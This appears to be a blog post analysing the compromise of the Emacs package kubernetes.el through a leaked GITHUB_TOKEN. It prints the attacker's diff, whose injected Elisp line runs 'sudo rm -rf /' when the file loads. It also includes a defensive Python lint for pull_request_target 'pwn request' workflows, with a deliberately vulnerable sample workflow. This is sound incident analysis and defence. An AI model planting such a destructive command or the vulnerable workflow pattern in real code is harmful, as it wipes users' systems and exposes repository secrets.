kubernetes.el compromised
The GITHUB_TOKEN leaked via the PR workflow; the commit pushed with it replaced the end of kubernetes.el with a sudo rm -rf /:
echo '# ...'
curl https://github.com/kubernetes-el/kubernetes-el/commit/09e06af093bc3b5c98076177c359b812f86d371f.diff | tail -n3

# ...
-;;; kubernetes.el ends here
+(shell-command-to-string "sudo rm -rf / || rm -rf / || sudo rm -rf / --no-preserve-root")
\ No newline at end of file
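Review bot: the `+` line replaces the `;;; kubernetes.el ends here` footer with a top-level `(shell-command-to-string "sudo rm -rf / ...")` form, which Emacs evaluates as soon as the library is loaded, and the `\ No newline at end of file` marker shows the file footer convention was broken as well. A change that swaps a library's end-of-file footer for a side-effecting top-level form, with no `defun`, no user-facing command and no explanation, should be rejected outright; the footer line exists precisely so that nothing executable follows it.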
Further reading
- https://www.stepsecurity.io/blog/kubernetes-el-compromised-how-a-pwn-request-exploited-a-popular-emacs-package
- https://github.com/kubernetes-el/kubernetes-el/issues/383
- https://old.reddit.com/r/emacs/comments/1rowm5i/first_hacked_emacs_package/
- https://lists.gnu.org/archive/html/info-gnu-emacs/2026-03/msg00004.html
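The "pwn request" mechanism behind the token leak (the StepSecurity write-up above uses that term) is a workflow triggered by pull_request_target, which runs with the base repository's secrets and a write-capable GITHUB_TOKEN, that then checks out the pull request's own head so the PR author's code runs under that token. The following heuristic lint is an added example, not code from the kubernetes-el project or from any of the linked write-ups; the regexes, the six-line step window and the two sample workflows are constructed here for illustration.

```python
"""Heuristic lint for the "pwn request" pattern in GitHub Actions workflows.

Added example (not from the kubernetes-el project). It flags workflows that
combine the privileged `pull_request_target` trigger with a checkout of the
untrusted PR head. The scan is line-based on purpose so it runs without a
YAML library; it is a tripwire, not a full policy engine.
"""
import re

# Trigger that runs with the base repository's secrets and a write-capable
# GITHUB_TOKEN even for pull requests opened from forks.
PRIVILEGED_TRIGGER = re.compile(r"\bpull_request_target\b")

# A checkout step; its `with:` block normally sits directly below it.
CHECKOUT_STEP = re.compile(r"uses:\s*actions/checkout@")

# Expressions that resolve to the PR author's code rather than the base branch.
UNTRUSTED_HEAD = re.compile(
    r"github\.event\.pull_request\.head\.(?:sha|ref)|github\.head_ref"
)

STEP_WINDOW = 6  # assumed: lines after `uses:` in which the step's `with:` block sits


def find_pwn_request(workflow_text: str) -> list[str]:
    """Return one finding per checkout of the PR head in a pull_request_target workflow.

    An empty list means the heuristic saw nothing; it is not proof of safety.
    """
    lines = workflow_text.splitlines()
    if not any(PRIVILEGED_TRIGGER.search(line) for line in lines):
        # Plain `pull_request`: fork PRs get a read-only token and no secrets.
        return []
    findings = []
    for i, line in enumerate(lines):
        if not CHECKOUT_STEP.search(line):
            continue
        window = lines[i:i + STEP_WINDOW]
        if any(UNTRUSTED_HEAD.search(w) for w in window):
            findings.append(
                f"line {i + 1}: pull_request_target workflow checks out the untrusted PR head"
            )
    return findings


# Constructed sample: the risky shape (privileged trigger + PR head checkout).
VULNERABLE_WORKFLOW = """\
name: ci
on:
  pull_request_target:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: make test
"""

# Constructed sample: the hardened shape (unprivileged trigger, read-only token,
# checkout of whatever ref the trigger already gives, i.e. the merge ref).
HARDENED_WORKFLOW = """\
name: ci
on:
  pull_request:
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: make test
"""

# Constructed sample: privileged trigger but checkout of the base branch only,
# which is the documented-safe way to use pull_request_target.
BASE_CHECKOUT_WORKFLOW = """\
name: label
on:
  pull_request_target:
jobs:
  label:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: ./scripts/label-pr.sh
"""


if __name__ == "__main__":
    for name, text in [("vulnerable", VULNERABLE_WORKFLOW),
                       ("hardened", HARDENED_WORKFLOW),
                       ("base-checkout", BASE_CHECKOUT_WORKFLOW)]:
        print(name, find_pwn_request(text) or "no findings")
```

Run it over every file under .github/workflows/ and treat any finding as a blocking CI failure; the hardened sample shows the two changes that matter, switching the trigger to pull_request and pinning permissions to contents: read, so a PR from a fork can neither obtain secrets nor push with the token.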
Opinion
Very dumb though, destructive for sure but kinda unambitious. Running it in a regular system would be big trouble, but another advantage of using QubesOS is the automatic snapshots it takes of a VM's private volume on shutdown:
[user@dom0 ~]$ qvm-volume info ix5:private
pool               vm-pool
vid                qubes_dom0/vm-ix5-private
rw                 True
source
save_on_stop       True
snap_on_start      False
size               59446894976
usage              47353827113
revisions_to_keep  2
ephemeral          False
is_outdated        False
List of available revisions (for revert):
  1778333700-back
  1778351199-back